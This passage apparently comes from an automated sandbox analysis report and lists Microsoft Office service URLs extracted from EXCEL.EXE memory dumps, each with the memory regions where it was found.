00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.aadrm.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://api.addins.omex.office.net/appinfo/queryU
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://api.addins.omex.office.net/appstate/queryF
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://api.addins.store.office.com/addinstemplatet
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.cortana.aiBearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://api.cortana.aiL
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://api.cortana.aiP
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.diagnostics.office.comBearer
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickSta
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.office.net
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://api.office.neti
Source: EXCEL.EXE, 00000000.00000003.435946000.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253247630.00000000131E9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488835453.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489559537.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253745102.00000000131E9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258235230.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429380944.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457381601.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450920010.00000000131E6000.00000004.00000001.sdmp	String found in binary or memory: https://api.office.netq
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.onedrive.com
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.onedrive.comMBI
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/USo
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://augloop.office.com
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://augloop.office.com/v2Bearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://augloop.office.com/v2Q
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.435946000.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253740668.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488835453.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489559537.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258235230.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429380944.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457381601.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450920010.00000000131E6000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
